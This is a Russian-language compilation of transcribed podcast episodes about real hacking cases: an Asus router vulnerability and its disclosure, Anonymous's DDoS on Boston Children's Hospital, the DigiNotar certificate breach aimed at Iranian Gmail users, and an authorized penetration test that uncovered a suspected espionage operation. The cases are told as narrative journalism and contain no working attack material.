ВЕДУЩИЙ: Далее Кайл обнаружил, что не только может получить доступ к своим личным фотографиям из своего дома через роутер, но и делился всеми своими данными со всем миром, ведь маршрутизатор был в Интернете с общедоступным IP-адресом. Что еще хуже, для доступа к его файлам не требовался пароль. Если бы хакер знал, что у вас есть этот роутер и что вы подключили к нему жесткий диск, этот хакер мог бы увидеть все ваши файлы на жестком диске за тысячи километров.

КАЙЛ: Я буквально мог зайти в свой браузер и просмотреть в браузере IP-адрес HTTPS/smb/tmp/lightep, имя веб-сервера, который я использовал. Когда вы это сделаете, он сбрасывает для вас текстовый файл с именем admin, а затем каким бы ни был их пароль: admin/admin, если пользователь не изменил свой пароль по умолчанию. Это заняло у меня всего двадцать-двадцать пять минут.

Я также смог получить к нему доступ извне с помощью открытого текстового пароля. Потом я позвонил другому другу, который жил довольно далеко, и спросил его, могу ли я попробовать подключиться к его роутеру (у него тоже был Asus N66). И, конечно же, я сразу же смог получить его пароль открытым текстом. Это было немного страшно. И меня действительно беспокоила эта уязвимость.

Я знал, насколько популярен этот маршрутизатор. Я быстро посмотрел в Интернете, чтобы узнать, нашел ли эту уязвимость кто-нибудь еще, но ничего не нашёл.

ВЕДУЩИЙ: Кайлу стало очевидно, что любой, у кого есть этот маршрутизатор, подвергает опасности всю свою домашнюю сеть. Кайл использовал веб-сайт Shodan, чтобы попытаться понять масштаб этой проблемы. Shodan — это веб-сайт, который сканирует весь Интернет, чтобы увидеть, какие IP-адреса активны и какие порты открыты. Он также пытается получить тип системы, работающей на этих IP-адресах. Кайл обнаружил, что не менее 50 000 человек используют уязвимый FTP-сервер.

Когда в программном обеспечении есть ошибки безопасности, а поставщик не знает о проблеме, это называется уязвимостью нулевого дня. Это называется нулевым днем, потому что именно столько дней прошло с тех пор, как поставщик узнал о проблеме. Как только поставщик узнает о проблеме, это больше не нулевой день, и поставщик может работать над выпуском исправления. А теперь поставьте себя на место Кайла. Вы только что обнаружили множество неисправленных ошибок в очень популярном домашнем маршрутизаторе. Эта ошибка позволяет вам получить доступ к частным сетям более чем 100 000 домов по всему миру. Вы можете не только легко войти в домашнюю сеть, но также иметь возможность просматривать все их файлы и использовать их маршрутизатор в качестве прокси. Что бы вы сделали, если бы у вас были такие знания и способности? Вы бы просмотрели все файлы, чтобы увидеть, что у них есть? Вы бы попытались продать эти эксплойты на темном рынке за биткойны? Как бы вы себя чувствовали в такой ситуации?

Для Кайла выбор был легким. Он не попытался просмотреть чужие файлы или использовать эти знания для чего-то злонамеренного. Он просто хотел, чтобы эта ошибка была исправлена, чтобы повысить безопасность для тысяч людей. На самом деле, он тоже был клиентом и хотел, чтобы ошибка была исправлена для его собственного маршрутизатора. Он начал выяснять, как связаться с Asus, создателями этого роутера.

После двух месяцев и трёх писем в Asus, Кайлу наконец ответили. Очень коротко: "Хорошо, мы посмотрим".

Однако, это не удовлетворило Кайла.

КАЙЛ: Я подождал ещё месяц, но они не решили проблему и не признали свою ошибку официально. Тогда я отправил им ещё около 6 писем. В ответ игнор. Я решил рассказать об этом публично. Но тут на моё последнее письмо ответили.

ВЕДУЩИЙ: На этот раз Asus связала Кайла с кем-то из отдела по связям с общественностью, который также является связующим звеном с разработчиками.

КАЙЛ: Мне сказали: «Хорошо, мы посмотрим на это, но всё было так и задумано». Это якобы их фишка. Серьёзно? Я не шучу, они так и ответили. Я решил рассказать об этом всем.

ВЕДУЩИЙ: Прошло ещё 4 месяца. На данный момент все ошибки, обнаруженные Кайлом, были достоянием общественности. Информация об этой уязвимости продолжала распространяться по Интернету. Высока вероятность того, что в это время к каждому FTP-серверу Asus обращались несколько незнакомцев. Вероятно, они просматривали файлы и брали все, что казалось интересным, и даже загружали файлы в качестве заначки. Неизвестная группа людей попыталась взять дело в свои руки. Они искали все уязвимые маршрутизаторы Asus и нашли чуть более десяти тысяч IP-адресов, на которых работал анонимный FTP-сервер. Они получили доступ к каждому из этих маршрутизаторов и оставили записку: «Внимание. Вы уязвимы. Это автоматическое сообщение, отправленное всем, кого это затронуло. Ваш маршрутизатор Asus и ваши файлы могут быть доступны любому человеку в мире, имеющему подключение к Интернету. Решение: немедленно полностью отключите FTP и AI Cloud». Записка была подписана /G. Это может означать, что хакеры пришли из 4Chan, которая использует /G в качестве своего имени. В заметке этот инцидент также называется ASUSGATE.

Давайте попробуем понять, что значит быть жертвой этого. Представьте, что вы засыпаете ночью в своей красивой, уютной, безопасной, теплой постели и спокойно спите всю ночь. Вы просыпаетесь, идете в ванную, и когда вы смотрите в зеркало, на нем приклеена записка, в которой говорится, что дверь в вашем доме была открыта в течение восьми месяцев, и любой мог войти. Хакеры не использовали никаких специальных инструментов, ни обходных путей, ни взломов, ни уловок для доступа к файлам. Они использовали стандартный FTP-клиент, и для того, что они делали, не требовался пароль. Поскольку Asus сказал, что это функция, а не ошибка безопасности, то еще более вероятно, что это действие не было преступным.

КАЙЛ: Это вернуло Asus в нужное русло, но Asus связались со мной, как будто это сделал я. Но я этого не делал. Это сделала какая-то другая группа хакеров. У них были благие намерения. Они просто сбрасывали текстовый файл на FTP.

ВЕДУЩИЙ: Новости о хакерах, загружающих заметки на маршрутизаторы людей, попали в крупные новостные сети. На самом деле Кайл даже дал интервью CNN, чтобы объяснить ситуацию. Он нервничал из-за интервью и был впечатлен тем, насколько известной стала новость.

В конце концов Asus исправили все ошибки, о которых сообщил Кайл, но после этого Кайл нашел еще больше ошибок в их исправленных версиях и тоже сообщил о них. В конце концов Asus решили и эти проблемы. Несколько лет спустя, Федеральная торговая комиссия США возбудила дело против Asus. Они утвердили следующие приказы, которым Asus должны подчиняться:
Не вводить своих клиентов в заблуждение относительно недостатков безопасности.

Четко уведомлять своих клиентов публично, когда доступно обновление для системы безопасности.

Проводить проверки безопасности своих продуктов. Это включает в себя тестирование на проникновение, обучение сотрудников, проверку кода, оценку рисков и многое другое. Аудиты безопасности должны быть представлены в ФТК.
Если Asus не выполнит какое-либо из этих распоряжений, они будут оштрафованы на 16 000 долларов за каждое нарушение. Самая суровая часть распоряжений ФТК заключается в том, что Asus должны выполнять эти приказы регулярно вплоть до 2036 года.

Тысячи людей все еще остаются уязвимыми, потому что они просто не исправили свой маршрутизатор. Доступно исправление, но они либо не знают об этом, либо не хотят его исправлять. Если у вас есть маршрутизатор Asus, рекомендуется поддерживать его в актуальном состоянии и исправлять. Теперь у исследователей безопасности есть новые методы работы с поставщиками для решения этих проблем. Некоторые компании предлагают вознаграждение за обнаруженные ошибки безопасности. Эти награды обещают, что исследователи заработают тысячи долларов, обнаружив одну уязвимость. Для справки, Кайл никогда не просил награды за вознаграждение и не предлагал никакой награды за свои открытия в маршрутизаторах Asus. В Министерстве внутренней безопасности есть филиал под названием Группа готовности к компьютерным чрезвычайным ситуациям США, или US-Cert.

ВЕДУЩИЙ: Мне любопытно, Кайл, какой домашний маршрутизатор ты используешь сегодня?

КАЙЛ: О, прямо сейчас у меня есть Xfinity — на самом деле у них две модели. Один для потоковой передачи 100 МБ, а другой для потоковой передачи обычного размера, в котором я действительно обнаружил уязвимость, потому что реальная прошивка этого и само оборудование маршрутизатора на самом деле сделаны Cisco, о которой я сообщил три нулевых дня.

ВЕДУЩИЙ: Похоже, куда бы Кайл ни посмотрел, он находит ошибки в этих домашних маршрутизаторах и даже в маршрутизаторах бизнес-класса.

КАЙЛ: Я думаю, что им еще предстоит пройти долгий путь, и я все еще думаю, что большинство поставщиков думают о безопасности задним числом. Пока этот менталитет не изменится и пока они действительно не задумаются о том, чтобы найти хорошего пен-тестера для тестирования своего продукта, мы все равно будем сталкиваться с нарушениями безопасности.

https://telegra.ph/EHpizod-7-Vnimanie--vy-uyazvimy-03-15

Эпизод 8: Anonymous и похищенный больницей ребёнок

Вступить в наш чат

Поговорим сегодня об Anonymous. Да-да, тех самых.

Во многих отношениях Anonymous заступаются за граждан мира и помогают бороться с коррупцией. Но что, если они выберут для атаки больницу? Место, где пациенты находятся на грани смерти и ежедневно проводятся операции по спасению жизней, место, куда люди обращаются в крайнем случае за помощью? Может ли хактивизм зайти слишком далеко?

https://i.gyazo.com/91486051846877385c2e653f03d7e93b.png

ВЕДУЩИЙ: В центре этой истории Джастина Пеллетье, пятнадцатилетняя девочка, живущая в Коннектикуте. Обычная девочка-подросток, за исключением того, что она была больна, она страдала митохондриальной болезнью. Генетическое заболевание, которое вызывает пло*** координацию мышц, сенсорные проблемы и заболевания органов. Это сделало Джастину больной и ограничило то, что она могла сделать в своей жизни. Но она лечилась от болезни и очень хотела пойти на поправку. Отец Джастины — Лу Пеллетье.

ЛУ: Когда малышка только заболела, её экстренно увезли на скорой в местную больницу. Там заявили, что никакой митохондриальной болезни нет. Однако, девочке становилось всё хуже. Нас пугали страшными диагнозами, торопили с тем, чтобы мы скорее подписали все бумаги. Тогда нам было плевать на стоимость лечения, ведь главное: здоровье нашей девочки. Мы согласились на лечение в этой больнице. Джастина страдала от тахикардии, она была совсем слаба. Но врачи почему-то отменяли ей лекарства. Мы стали серьёзно переживать и решили забрать её в другую больницу. Тут то начались проблемы.

ВЕДУЩИЙ: Больница связалась со Службой защиты детей, которая в Бостоне известна как DCF, Департамент по делам детей и семьи. DCF забрал Джастину из-под опеки ее родителей и передал ее под опеку штата Массачусетс из-за медицинских разногласий между родителями и больницей. Это было очень травмирующим для семьи Пеллетье. Они считали, что то, что они делали лучшее для их дочери. После того, как ей поставили диагноз, дочь забрали у родителей. У родителей было очень короткое время свиданий, им не разрешалось разговаривать с врачами, а иногда их даже выводила из больницы полиция. В довершение всего суды запретили родителям общаться с прессой. Прошло больше года, когда Джастина осталась в Бостонской детской больнице, где ее лечили от болезни. Она не могла приехать домой ни на день рождения, ни даже на Рождество, потому что ее домом была больница, потому что она находилась под опекой штата Массачусетс.

Тринадцать месяцев спустя с Лу сняли запрет на прессу, и он наконец смог рассказать свою историю. После года пребывания в Бостонской детской больнице Джастина достаточно поправилась, чтобы выписаться, но, находясь под опекой штата Массачусетс, она не могла вернуться домой. Ее перевели в молодежное учреждение под названием Wayside, где лечили от якобы психического заболевания.

ЛУ: Нам не отдавали дочь. Мы ходили по судам. Однажды в зале суда, рубашка Джастины немного задралась, и я увидел на её животе, где была операция, красную полоску. Это было похоже на сепсис. Прямо сейчас моя дочь умирает и никто не может ей помочь.

ВЕДУЩИЙ: Из-за того, как пугающе звучит эта история и насколько отчаянными кажутся родители, пресса подхватила эту историю. Информационные агентства по всей стране сходили с ума, рассказывая о Джастине. Лу дал множество интервью для национальных новостей, таких как Fox News, Glenn Beck и даже шоу доктора Фила. Люди по всей стране были напуганы, шокированы и даже возмущены такой историей. В соцсетях гудели разговоры о том, как ужасно, что больница забрала Джастину от ее родителей. Как только новость стала общенациональной, Anonymous загрузили зловещее видео на YouTube. Вот отрывок из этого видео.

ANONYMOUS: Здравствуйте, сограждане. Мы Anonymous. Нам стало известно, что пятнадцатилетняя девочка по имени Джастина Пеллетье удерживалась против ее воли в штате Массачусетс более года. У Джастины заболевание, известное как митохондриальное заболевание, однако Бостонская детская больница считает, что все это просто в ее голове, и в результате она была задержана в дополнение к физическим и психическим пыткам со стороны этой коррумпированной системы не более чем из-за болезни. Anonymous и американский народ не потерпят этого жестокого обращения с нашими детьми и примут ответные меры, используя любые необходимые средства, чтобы защитить наших сограждан от этого жестокого и манипулятивного поведения.

Мы накажем всех виновных и не смягчимся, пока Джастина не будет на свободе. Это будет нашим первым и последним предупреждением. Несоблюдение наших требований приведет к возмездию. Освободите Джастину и верните ее домой к семье. Голос народа будет услышан. Мы Anonymous. Мы легион. Мы не прощаем. Мы не забываем. Ждите нас. Операция Джастина началась.

ВЕДУЩИЙ: В видео также фигурировали многие имена сотрудников Бостонской детской больницы, а также имя судьи, который рассматривал дело, призывая этих людей к увольнению или угрозам. На следующий день начали появляться сообщения в Твиттере под хэштегом #opjustina. Anonymous также разместили в открытом доступе дампы личной информации судьи и врачей, указав их адрес, номер домашнего телефона и многое другое. Больница увидела документы, которые были размещены с домашними адресами врачей и адвокатов и их телефонными номерами. Они видели видео и видели твиты. Они знали, что грядет нападение, но не знали, когда и насколько оно велико. Больница вызвала полицию, потому что что еще можно сделать в такой ситуации?

14 апреля 2014 года Anonymous начали DOS-атаку сайта больницы. Они сделали так, будто этого сайта никогда и не существовало. На сайт нельзя было зайти. Однако больница пыталась дать отпор.

Наступает 19 апреля. Это день патриота в США, а также день большой кампании по сбору средств для Бостонской детской больницы. Основной способ сделать пожертвование их больнице — через веб-сайт. ИТ-отдел больницы все больше беспокоился. В этот день DOS-атака стала намного масштабнее. Anonymous вывели из строя не только основной веб-сайт, который не позволял людям делать пожертвования на кампанию по сбору средств, но и многие другие системы в общедоступной сети больницы. Гарвардский университет связан с Бостонской детской больницей одной сетью, которая перестала работать.

Несмотря на то, что атака стала намного масштабнее, с ней удалось справиться, и веб-сайты начали восстанавливаться. Но СМИ продолжали муссировать историю о том, как Джастину забрали у родителей. Это привело к большому количеству протестующих возле больницы и залов суда.

ВЕДУЩИЙ: В какой-то момент также просочилось видео Джастины, в которой она умоляла отправить ее домой и что она так скучает по своей семье. Все это только подлило масла в анонимную кампанию #opjustina. К ним присоединялись новые сторонники Anonymous, и DOS-атака против больницы росла и становилась все более серьезной. Злоумышленники начали атаковать телефонные линии, звонить и сообщать ответившим, что их банковский счет взломан. Они также рассылали много спама и фишинговых писем. В какой-то момент сотрудник больницы нажал на фишинговое письмо, и хакеры смогли проникнуть на почтовый сервер больницы.

Атаки продолжались день за днем, неделя за неделей, и атаки становились все больше и больше с каждым днем, и в конечном итоге достигли 27 ГБ в секунду. Люди, которые не имели никакого отношения к Джастине, не могли получить медицинскую помощь, и это самое ужасное в такой кибератаке.


https://i.gyazo.com/be436c4bfe436b347fd0a0e4f1e51857.pngНо в один день один из самых популярных аккаунтов Anonymous написал в Твиттере: «Всем «анонимам», атакующим ДЕТСКУЮ БОЛЬНИЦУ от имени Anonymous, ЭТО БОЛЬНИЦА: ПРЕКРАТИТЕ ЭТО». На следующий день атаки прекратились почти полностью. После трех недель непрерывной распределенной атаки типа «отказ в обслуживании» сетевой трафик вернулся к норме.

ФБР, конечно, заинтересовалась этой историей. Вот только их интересовала не свобода Джастины, а кибератака. По оценкам больницы, ущерб от этой атаки составил 300 000 долларов. ФБР начали поиски хакеров.

Позже они нашли того, кто выложил то самое видео на Ютуб. Им оказался Мартин Готтесфельд. Изначально он отрицал свою причастность к атакам, а потом внезапно исчез вместе с женой.

Его нашли через три недели на Багамах и заключили под стражу. Позже в тюрьме он даст интервью газете, где расскажет почему совершил кибератаку на детскую больницу. Он всего лишь хотел спасти девочку и сотни таких же беззащитных людей. Под знаменем Anonymous она и другие дети, находящиеся в интернатах, будут защищены.

Что касается Джастины, протесты возле больницы продолжали расти, и в какой-то момент сотни сторонников самой больницы скандировали ее освобождение. Все больше и больше средств массовой информации освещали ее дело, и после шестнадцати месяцев, проведенных вдали от родителей, судья постановил, что она может вернуться домой.

https://i.gyazo.com/5194d4c7fd66ad40d587ba26575beee2.png

Протестующие собрались в поддержку освобождения Джастины

ЛУ: Когда я возвращался в свой офис, зазвонил мой телефон. Это была Джастина. Она кричала: "Папа, папа, я еду домой!" Я просто славил Господа. Она снова стала частью семьи Пеллетье.

ВЕДУЩИЙ: Сейчас, спустя несколько лет, Джастина дома со своей семьей. Все еще не может ходить, но ее здоровье улучшилось с тех пор, как она вернулась домой. Мы до сих пор не услышали внятной истории со стороны больницы или государства о том, почему ее забрали, так что это пока остается однобокой историей. Семья Пеллетье теперь судится с больницей из-за этого инцидента, утверждая, что во время ее визита с ней не обращались должным образом. Этот судебный процесс все еще продолжается.

А что про того хакера? Суд признал Мартина виновным. В августе 2018 года федеральный судья признал его виновным по двум пунктам обвинения, включая сговор с целью повреждения защищенных компьютеров против Бостонской детской больницы. Судья сказал, цитирую: «Ваше преступление презренно, коварно и отвратительно». Затем, в январе 2019 года, Мартин был приговорен к десяти годам тюремного заключения и должен выплатить больнице 443 000 долларов в качестве компенсации.

https://telegra.ph/EHpizod-8-Anonymo...rebyonok-03-22

Эпизод 9: Политика и взлом почты иранцев

Вступить в наш чат

ВЕДУЩИЙ: Парень из Ирана проверяет свою электронную почту. Он вводит gmail.com в свой браузер и нажимает Enter. Выскакивает странное предупреждение. Он не может получить доступ к Gmail. Он подключается к VPN и пытается снова. Через впн коннектится нормально. Он публикует вопрос на форумах Google, спрашивая, не происходит ли возможная атака. Он также говорит, что подозревает, что его интернет-провайдер или иранское правительство делают что-то подозрительное. Google не только отреагировал на сообщение на форуме, но и опубликовал предупреждение о безопасности для всего мира и выпустил экстренный патч для своего браузера Chrome. Mozilla, Microsoft и Apple быстро выпустили аналогичные обновления безопасности. Произошла атака на пользователей Gmail; атака, подорвавшая безопасность во всех браузерах, атака, имевшая разрушительные последствия.

https://i.gyazo.com/c15dc992844e52e151091f9871fd2296.png

https://telegra.ph/file/6b16421fb28297b4bc672.png

Затем мы видим странный пост на Pastebin. Pastebin — это веб-сайт, на котором любой желающий может опубликовать сообщение анонимно. Это сообщение было написано человеком по имени Comodo Hacker и гласит: «Здравствуйте. Я пишу это всему миру, чтобы вы узнали об этом больше, но сначала я хочу дать вам несколько советов, чтобы вы были уверены, что я хакер. Я взломал Comodo (Comodo Internet Security — программный комплекс, состоящий из антивируса и персонального файрвола, а также песочницы, системы предотвращения вторжений HIPS и виртуальной среды «Virtual Kiosk» для Microsoft Windows XP, Vista, Windows 7 и Windows 8.) с помощью мгновенного SSL. Их логин/пароль был GT admin и global trust. Я хакер-одиночка с опытом как у 1000 хакеров». Далее в сообщении объясняется, как он попал внутрь и что он сделал. В самом конце он пишет на персидском: «Я пожертвую своей душой за моего лидера». Пять дней спустя Comodo объявляет о втором вторжении, но упоминает, что хакер ничего не смог сделать, и они устранили дыры в своей сети. В целом, Comodo довольно хорошо справился с этой проблемой. Они быстро обнаружили и устранили проблему и уведомили общественность.

Компания DigiNotar знала, что безопасность жизненно важна для репутации компании, и вложила значительные средства в собственную безопасность. Мне нравится иногда думать о защите сети, как о защите замка с десятью тысячами дверей и окон. Даже если вы потратите время, чтобы проверить каждую дверь и окно, чтобы убедиться, что они заперты, вы можете пропустить одну из них или не знать о ней, и со временем вы обязательно совершите ошибку и оставите дверь незапертой. Потому что вы были ленивы или рассеяны, но люди ошибаются. Летом 2011 года DigiNotar совершил такую ошибку, и в их сеть проник хакер.

https://i.gyazo.com/92167f3d7df1a4d8bb572f87c96cfcc4.png

ЖОЗЕФИНА: Атака начинается с того, что злоумышленник фактически подключается к общедоступным веб-серверам, которые есть у DigiNotar. Злоумышленник подключается к своим веб-серверам, использует некоторые из этих устаревших уязвимостей и использует эти уязвимости, чтобы пройти через этот невероятно обширный набор правил брандмауэра в то, что должно быть самым безопасным хранилищем их сети. Далее хакер получает сертификаты сети.

ВЕДУЩИЙ: С этими сертификатами хакер теперь может стать фактически Google. Он может заставить браузер поверить, что это google.com. Это потому, что DigiNotar был одним из доверенных центров сертификации в браузере. Это нарушение произошло 10 июля 2011 года, и в итоге он выдал 531 мошеннический сертификат. Девять дней спустя DigiNotar обнаружил нарушение, но не объявил об этом публично. Месяц спустя на форуме Google появилось сообщение о человеке в Иране, который не смог попасть на gmail.com.

ЖОЗЕФИНА: Людей в Иране, которые пытались подключиться к своим учетным записям Gmail, перенаправляют на неверный веб-сайт, который, вероятно, выглядит точно так же, как настоящий Gmail. Поскольку у них есть мошеннические сертификаты, выпущенные DigiNotar, люди, создавшие этот поддельный веб-сайт Gmail или Google, могут на самом деле подписать его и выглядеть так, как будто это действительно сайт Google. Люди заходят на сайты Google и вводят свои учетные данные. Мы подозреваем, что эти учетные данные затем используются для слежки за их учетными записями Google различными способами.

ВЕДУЩИЙ: Хакер обманул DNS-серверы в Иране, чтобы любой, кто ищет google.com, вместо этого перенаправлялся на его IP. Более 300 000 человек из Ирана посетили мошеннический сервер. Эта атака, похоже, была направлена против иранских мирных жителей. Эта атака могла остаться незамеченной какое-то время, но у Google был хитрый способ ее обнаружить.

ДЖЕРВЕЙС: В случае с DigiNotar их сеть была тщательно взломана в течение нескольких месяцев. В их журналах был беспорядок. Их инфраструктура была в беспорядке. Не было никакого способа указать масштаб взлома. Из-за катастрофических сбоев в системе безопасности было невозможно продолжать какое-либо доверие к системам и организациям DigiNotar.

ВЕДУЩИЙ: Когда Mozilla решила, что DigiNotar больше не заслуживает доверия, они удалили их из корневого хранилища, но пользователям нужно было обновить свой браузер, чтобы получить версию Firefox, которая не доверяла DigiNotar. Все остальные корневые хранилища также удалили DigiNotar из списка доверенных. Спустя почти два месяца после взлома и спустя много времени после того, как Иран стал целью массированной атаки, DigiNotar наконец публично признала, что была взломана.

ЖОЗЕФИНА: Как только это произошло, компания в значительной степени исчезла из поля зрения. Мы не знаем, кто это сделал. Никто не был пойман или привлечен к ответственности за это нарушение. Fox-IT также обнаружила, что хакер оставил сообщение на сервере, который был взломан. Частично он гласил: «В этом мире не существует никакого оборудования или программного обеспечения, которое могло бы остановить мои сильные атаки, мой мозг, мои навыки, мою волю или мой опыт». С сообщением в конце на персидском языке: «Я пожертвую своей душой ради своего лидера».

ВЕДУЩИЙ: Но кому захочется читать электронную почту иранских граждан? У США были конфликты с Ираном, поэтому это может вызывать подозрения. Эта теория не очень сильна и почти не имеет других доказательств, так кто же еще может нацеливаться на простых жителей Ирана? Само иранское правительство. Чтобы понять почему, нам нужно вернуться на два года назад до взлома. В 2009 году в Иране прошли президентские выборы. Мамуд Ахмадинежад победил на выборах, набрав 63 процента голосов, но против этого была сильная оппозиция. Многие иранцы считали, что голоса были подделаны, а выборы сфальсифицированы. Сразу же начались протесты. Это создало раскол среди народа Ирана. Некоторые люди стали крайне недоверчивыми к правительству, в то время как другие стали чрезвычайно лояльными. Полиция начала арестовывать протестующих, а когда протестующие не уходили, в них распыляли перцовый баллончик, били дубинками, а иногда и стреляли.

В течение трех месяцев после выборов погибли семьдесят два протестующих. Коррупция была настолько сильна, что полиция заставляла семьи подписывать бумаги, в которых говорилось, что их умершие родственники умерли от сердечного приступа, а не от жестокости полиции. Как вы можете себе представить, это только разожгло еще больше эмоций у жителей Ирана. В течение многих лет после этого иранское правительство усердно работало над устранением любой правительственной оппозиции. Это продолжалось до тех пор, пока не произошла атака DigiNotar. Есть сильная теория, что этот взлом был сделан самим иранским правительством или кем-то, кто пытался помочь иранскому правительству. Возможно, они просматривали электронные письма, пытаясь найти инакомыслящих и тех, кто недоволен иранским президентом. Если бы они были обнаружены, это могло привести к аресту, пыткам или убийству людей.

ВЕДУЩИЙ: Взлом происходит во всем мире. Это меняет наш подход к обеспечению безопасности. В некотором смысле хакеры подобны иммунной системе Интернета. Они заражают нас, мы болеем, выздоравливаем, а потом становимся еще сильнее. Даже сегодня, столько лет спустя, когда в компании случается крупная брешь, кто-то всегда напоминает нам о судьбе DigiNotar.

https://telegra.ph/EHpizod-9-Politika-i-vzlom-pochty-irancev-03-29

Эпизод 10: встретились как-то бывший агент АНБ, морской котик, офицер армейской контрразведки и русский шпион

Вступить в наш чат

Ведущий: Многие хакеры действуют в одиночку и относятся к этому как к виду искусства. Они планируют свою атаку, полагаются на свою интуицию, чтобы провести взлом, но Айра делает это по-другому.

Айра: Я специализируюсь на том, чтобы собирать команды бывших офицеров спецназа и разведки для взлома организаций.

Ведущий: Её команда собирается приступить к выполнению миссии, в которой на карту поставлено более миллиарда долларов.

Айра: Когда вы крадете миллиард долларов в первый раз, это немного спешка. После того, как вы проделали это так много раз, это уже легко.

Ведущий: Восемь лет назад я услышал выступление Айры на конференции по безопасности, и она сразил меня наповал. Это одна из тех бесед, которые я никогда не забуду, и я очень рад возможности снова поговорить с ней.

Айра: В конце концов тогда я устроилась на работу аналитиком разведки в Национальный центр разведки сигналов, который был известен как NSTOC.

Ведущий: Айра скрывает то, что она делала там, потому что так и должно быть. Разведка сигнала собирает информацию от врага, а враги повсюду. Всегда есть угроза, вынашиваемая где-то, возможно, в других странах, планирующих нападение на нас, или террористические группы встречаются, чтобы обсудить свои следующие шаги. Разведка сигнала - это знание того, что замышляет враг. Вы делаете это, выясняя, где они находятся, а затем придумываете способ перехватить эти переговоры. Айра стала более опытной и начала изучать, как работают шпионы. Но в конце концов она ушла из NSTOC и присоединилась к частной компании. Они выполняли различные ИТ-задачи, но однажды им попалась новая работу по контракту.

Ведущий: Необходимо было проверить уязвимости крупного национального банка. Спустя пару недель, используя только телефон и свое остроумие, Айра в конце концов смогла получить доступ к банку. Она выступила с докладом на конференции по безопасности и написала статью о том, как она это сделал.

Айра: Потом, когда это получило действительно широкую огласку и люди начали приходить ко мне, чтобы делать все более и более странные вещи, многие предлагали: "Хорошо, мы хотим, чтобы ты пришла в нашу компанию в качестве временного сотрудника и ограбила нас вслепую". Так я и сделала.

Ведущий: Так началась карьера Айры в качестве социального инженера и тестировщика уязвимостей. Ей платили за то, чтобы она проверил, можно ли получить доступ к секретным местам. По мере того как задания становились все более и более странными, она все лучше и лучше получал несанкционированный доступ. В конце концов она основала собственную консалтинговую компанию по безопасности. Но вот тут-то все и становится совершенно безумным.

Айра: Я специализируюсь на том, чтобы собирать команды бывших офицеров спецназа и разведки, чтобы они пытались взломать системы, как это делали бы настоящие хакеры.

Ведущий: Например, есть Стью.

Айра: Стью - бывший морской котик.

Ведущий: Он чрезвычайно подтянут, ловок, тактичен и имеет многолетний опыт шпионажа и рейдерства. Да, рейдерство. Он знает, где искать слабые места в конструкции, и он хорош в том, чтобы оставаться незамеченным службой безопасности. Он помогает Айре всякий раз, когда возникает необходимость в физическом вторжении.

Ведущий: Потом есть Стэн. Стэн в некотором роде мой любимчик.

Айра: Стэн был полковником ГРУ до того, как перешел на другую сторону.

Ведущий: ГРУ - это российское агентство внешней разведки, аналогичное ЦРУ. Их часто обучают следить за шпионами или использовать в чужих странах для сбора информации. Стэн имеет обширную подготовку в области сбора разведданных. Помимо того, что он был русским оперативником, его главной целью, пока он служил в ГРУ, был Китай. Он свободно говорит по-китайски. Он также читает по-китайски. Стэн приехал в США, чтобы собрать данные о правительстве США и передать их обратно в Россию. Он искусный шпион. Он часто ездил в Колумбию, и тусовался в барах, где со временем устанавливал доверительные отношения с целью и заставлял его разглашать государственные секреты.

Ведущий : Поскольку репутация Айры как элитного тестировщика росла, она получил контракт от одной из крупнейших компаний в мире.

Айра: Компания Global 5.

Ведущий: Они хотели, чтобы Айра провела симуляцию шпионажа против них, чтобы увидеть, насколько они уязвимы. Сейчас компания Global 5 стоит сотни миллиардов долларов, а это значит, что компании есть что терять. Работа Айры заключалась в том, чтобы найти как можно больше слабых мест.

Айра начала планировать миссию. Сначала она выяснил местонахождение отдела RND, который оказался в маленьком городке у черта на куличках. Она использовала Google Maps и другие инструменты, чтобы узнать больше. Вся территория была обнесена забором, и там стояли охранники, чтобы люди не могли въезжать внутрь. Она знала, что ей понадобится некоторая помощь, поэтому назначила Стью, Тони и Стэна на миссию. Все четверо летят в маленький городок, где располагался офис исследований и разработок. Команда прибывает одна за другой: бывший агент АНБ, морской котик, офицер армейской контрразведки и русский шпион.

Ведущий: Отряд начинает миссию. Сначала они осматривают здание и смотрят, во что одеты люди, когда они приходят и уходят. Они замечают, какие есть точки въезда и как проходит трафик. Затем они перегруппировываются, чтобы надеть одежду, чтобы физически слиться с другими сотрудниками. Все четверо садятся в машину и едут к зданию.

Там были охраняемые ворота, чтобы попасть в кампус, с настоящими охранниками, проверяющими каждого проходящего. Но в то утро было много пробок.

Айра: Все просто выстроились в очередь, съезжая с главной дороги, и все такое. Ты показываешь что-то похожее на значок, а они не проверяют. Никто не хочет замедлять утренний час пик. Они просто махнули нам, чтобы мы проходили. Мы знали, где находится их компьютерный операционный центр и сразу направились туда. Затем мы узнаем, что все их критически важные серверы были оставлены включенными в систему как администраторы. Мы просто добавили новую запись .rhost и начали осматривать их сервера. На этом первый день закончился.

Ведущий: Оставалась еще пара задач, которые команда хотела выполнить. Тони сделал несколько телефонных звонков и пытался заставить людей сообщать ему имена пользователей и пароли по телефону.

Айра: Конечно, Тони умел разведывать информацию направо и налево.

У нас было свободное время. Мы проехали вокруг, заглянули в разные рестораны и так далее, пока Стэн проводил свою контрразведывательную оценку местности. Звонит мне через два дня, говорит: "Айра, в меню есть яйца из черной утки". Я такая: "Какого хрена? Это то, за что мы тебе платим?" Он ответил: "Мой наивный американский друг, разве ты не знаешь яйца черной утки - деликатесный фарфор?". Затем вы начинаете собирать все воедино.

https://i.imgur.com/syLI7b7.jpg

Стэн, находясь в офисе компании, видел американско-китайский словарь. Он начал проверять китайские рестораны в округе один за другим и наконец нашёл тот, где компания проводила переговоры. Наверняка там должны быть какие-то записи. Ресторан был очень странным, китайцы были удивлены его приходу. Ресторан выглядел так, будто занимается чем-то ещё помимо китайской кухни.

Айра: Стэн, по сути, обнаружил, что китайская разведывательная операция действует через дорогу.

Ведущий: Операция китайской разведки в центре этого маленького городка, прямо через дорогу от центра исследований и разработок компании Global 5, привела Айру и команду к одному выводу: высока вероятность того, что этот китайский ресторан был создан для того, чтобы украсть коммерческие секреты компании и отправить их обратно в Китайские правительственные учреждения. Этот ресторан, возможно, использовался для найма сотрудников компании и сбора информации. Часто временных сотрудников превращают в шпионов, и пребывание там всего лишь короткое время означает, что у вас меньше шансов быть пойманным. Или, возможно, они просто записали бы все разговоры, которые происходили в этом ресторане, надеясь уловить секреты или что-то более зловещее.

Айра: Мы сообщили компании об их китайских шпионах, они проинформировали ФБР. Я подготовила отчёт для гендиректора Global 5.

Ведущий: Это еще одна вещь, которая впечатляет меня в Айре, она не просто указывает в отчете, что уязвимо, но и дает четкую сумму в долларах генеральному директору о том, во сколько подобная кража может обойтись компании. Когда генеральный директор видит уязвимости с точки зрения сумм в долларах, действия происходят намного быстрее, потому что они говорят на одном языке.

